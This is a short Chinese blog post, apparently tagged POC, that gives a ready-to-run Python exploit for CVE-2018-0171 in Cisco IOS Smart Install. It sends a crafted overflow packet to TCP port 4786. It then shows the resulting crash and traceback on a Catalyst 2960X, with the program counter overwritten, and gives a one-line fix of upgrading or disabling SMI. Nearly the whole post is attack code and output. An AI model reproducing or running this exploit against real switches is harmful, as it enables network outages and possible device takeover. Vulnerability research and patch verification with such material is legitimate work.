标签归档:POC

Cisco IOS and IOS XE Software Smart Install 可用POC(CVE-2018-0171)

1.话不多说

# smi_ibc_init_discovery_BoF.py

import socket
import struct
from optparse import OptionParser

# Parse the target options
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1")
parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786)
(options, args) = parser.parse_args()

def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v

def send_packet(sock, packet):
sock.send(packet)

def receive(sock):
return sock.recv()

if __name__ == "__main__":
print "[*] Connecting to Smart Install Client ", options.target, "port", options.port
con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con.connect((options.target, options.port))

payload = 'BBBB' * 44
shellcode = 'D' * 2048

data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload

tlv_1 = craft_tlv(0x00000001, data)
tlv_2 = shellcode

hdr = '\x00\x00\x00\x01' # msg_from
hdr += '\x00\x00\x00\x01' # version
hdr += '\x00\x00\x00\x07' # msg_hdr_type
hdr += struct.pack('>I', len(data)) # data_length

pkt = hdr + tlv_1 + tlv_2

print "[*] Send a malicious packet"
send_packet(con, pkt)

2.漏洞验证

思科官方检测脚本
https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py

直接运行poc

3.设备重启

观察系统日志
Queued messages:
Apr 8 15:30:47.244: %SYS-3-LOGGER_FLUSHING: System pausing to ensure console debugging output.

Apr 8 15:28:39.430: %SYS-3-CPUHOG: Task is running for (2328)msecs, more than (2000)msecs (0/0),process = SMI IBC server process.
-Traceback= 0x2FF6FB8z 0x1EC15ACz
Apr 8 15:28:41.758: %SYS-3-CPUHOG: Task is running for (4656)msecs, more than (2000)msecs (0/0),process = SMI IBC server process.
-Traceback= 0x2FF6FB8z 0x1EC15ACz
Apr 8 15:28:44.086: %SYS-3-CPUHOG: Task is running for (6984)msecs, more than (2000)msecs (0/0),process = SMI IBC server process.
-Traceback= 0x2FF6FB8z 0x1EC15ACz
Apr 8 15:28:46.414: %SYS-3-CPUHOG: Task is running for (9312)msecs, more than (2000)msecs (0/0),process = SMI IBC server process.
-Traceback= 0x2FF6FBCz 0x1EC15ACz
Apr 8 15:28:48.741: %SYS-3-CPUHOG: Task is running for (11640)msecs, more than (2000)msecs (0/0),process = SMI IBC server process.
-Traceback= 0x2FF6FBCz 0x1EC15ACz
Apr 8 15:30:57.999: %SYS-3-CPUHOG: Task is running for (12804)msecs, more than (2000)msecs (16/0),process = SMI IBC server process.
-Traceback= 0x2E264C0z
Cisco IOS Software, C2960X Software (C2960X-UNIVERSALK9-M), Version 15.2(2)E3, RELEASE SOFTWARE (fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 26-Aug-15 07:12 by prod_rel_team

Debug Exception (Could be NULL pointer dereference) Exception (0x2000)!
SRR0 = 0x02749DBC SRR1 = 0x00029200 SRR2 = 0x02E31488 SRR3 = 0x00029200
ESR = 0x00000000 DEAR = 0x7FB2B21B TSR = 0x84000000 DBSR = 0x01000000

CPU Register Context:
Vector = 0x00002000 PC = 0x02E31488 MSR = 0x00029200 CR = 0x33005053
LR = 0x02E31488 CTR = 0x021ABFD0 XER = 0xC0000067
R0 = 0x02E31488 R1 = 0x06DC6BF4 R2 = 0x00000000 R3 = 0x05825B4C
R4 = 0x00000000 R5 = 0xA0000000 R6 = 0x00000000 R7 = 0x0000493C
R8 = 0x00000000 R9 = 0x00000000 R10 = 0x04440000 R11 = 0x04440000
R12 = 0x33005055 R13 = 0x0F183214 R14 = 0x03BE5A88 R15 = 0x03BE5968
R16 = 0x04EE1478 R17 = 0x06DC6DD8 R18 = 0x03BE5A48 R19 = 0x06DC6DC8
R20 = 0x04440000 R21 = 0x00000001 R22 = 0x04EE0000 R23 = 0x077CC254
R24 = 0x077DD694 R25 = 0x06DC6C80 R26 = 0x000000D8 R27 = 0x06DC6CA0
R28 = 0x06DC6C9C R29 = 0x00000000 R30 = 0x041EBD0C R31 = 0x00000000

Stack trace:
PC = 0x02E31488, SP = 0x06DC6BF4
Frame 00: SP = 0x06DC6C04 PC = 0x02E31488
Frame 01: SP = 0x06DC6C14 PC = 0x02E29B44
Frame 02: SP = 0x06DC6C2C PC = 0x02E34088
Frame 03: SP = 0x06DC6C78 PC = 0x02E25D4C
Frame 04: SP = 0x06DC6CD8 PC = 0x015D4A24
Frame 05: SP = 0x42424242 PC = 0x42424242

4.修复方案

升级or关闭smi协议